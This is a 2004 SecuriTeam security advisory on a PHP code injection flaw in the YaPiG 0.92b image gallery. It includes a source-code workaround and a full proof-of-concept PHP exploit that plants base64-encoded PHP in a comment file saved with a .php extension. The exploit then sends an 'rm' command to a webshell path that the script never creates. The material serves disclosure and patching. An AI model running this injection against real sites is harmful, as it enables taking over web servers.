[UNIX] YaPiG add_comment.php PHP Code Injection
From: SecuriTeam (support_at_securiteam.com)
Date: 08/18/04
- Previous message: SecuriTeam: "[TOOL] MSN Messenger Password Decrypter"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 18 Aug 2004 14:05:57 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
YaPiG add_comment.php PHP Code Injection
------------------------------------------------------------------------
SUMMARY
<http://yapig.sourceforge.net/> YaPiG is "a simple but powerful web album
very useful for publishing your image galleries". A vulnerability in the
product allows remote attackers to insert PHP code into the comments they
post, and at the same time control the extension of comment file being
created.
DETAILS
Vulnerable Systems:
* YaPiG version 0.92b
Immune Systems:
* YaPiG version 0.92b (Latest downloaded files appear to be immune to PHP
inclusion as it removes all <?PHP tags)
Exploit:
#!/usr/bin/php
<?
/*
YaPiG 0.92b add_coment PHP Insertion Proof of Concept
By aCiDBiTS acidbits@hotmail.com 07-August-2004
Description:
YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
This Proof of Concept creates a php file that echoes a notice.
First it determines a valid photo directory where to create the
script.
Then creates a crafted comment saved in a new .php file. This comment
contains an encoded webshell. Once this .php file is opened, the code
contained creates test.php.
Usage (in my debian box):
php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b"
Vulnerability:
There is no user input sanization of some parameters in
add_comment.php
and functions.php.This allows to create a file with any extension, and
we can
insert any code in it. Version 0.92b is vulnerable, I haven't tested
older ones.
Workaround. Modify this lines of code:
add_comment.php
line 105:
$comments_file= $gid_dir . $gid . "_" . $phid;
Modify with:
$comments_file= $gid_dir . $gid . "_" . intval($phid);
functions.php, construct_comment_line()
line 699-700:
$linea=$linea . $data_array['mail'] . $SEPARATOR;
$linea=$linea . $data_array['web'] . $SEPARATOR;
Modify with:
$linea=$linea . htmlspecialchars($data_array['mail']) .
$SEPARATOR;
$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;
*/
echo "+-------------------------------------------------------+\n| YaPiG
0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS
acidbits@hotmail.com 07-August-2004
|\n+-------------------------------------------------------+\n\n";
$websh="<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgIC
AgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8
XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
?>";
if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
echo "[+] Getting valid gid & photo path ... ";
$webc=get_web($host);
$temp=explode(";gid=",$webc);
$gid=intval($temp[1]);
$temp=explode("photos/",$webc);
$temp=explode("/",$temp[1]);
$path=$temp[0];
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n";
echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php",
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm
".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");
function get_web($url)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
function send_post($url,$data)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
/* \ /
(Oo)
//||\\ */
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:acidbits@hotmail.com>
acidbits.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] MSN Messenger Password Decrypter"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Multiple Vulnerabilities within PHP 4/5 (pack, unpack, safe_mode_exec_dir, safe_mode, realpat
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... PHP is "a widely-used general-purpose
scripting language that is ... several vulnerabilities within PHP were ... unserialize()
- Wrong Handling of Negative References ... (Securiteam) - [UNIX] Dotdeb PHP Email Header Injection Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Dotdeb PHP Email Header Injection
Vulnerability ... This patch adds an X-PHP-Script header to ... (Securiteam) - [NEWS] PHP getimagesize() Multiple DoS Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... PHP is a widely-used general-purpose
scripting language that is especially ... Remote exploitation of a denial of service condition
in the PHP ... Local exploitation of an input validation vulnerability in The PHP Group's
... (Securiteam) - [UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... There is a privilage escalation
vulnerability in PHP. ... Used to set a boolean configuration directive. ...
can not be overridden by .htaccess or virtualhost directives. ... (Securiteam) - [UNIX] PHP memory_limit Remote Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... According to Security Space
PHP is the most popular Apache module and is ... When PHP allocates a block
of memory it ... (Securiteam)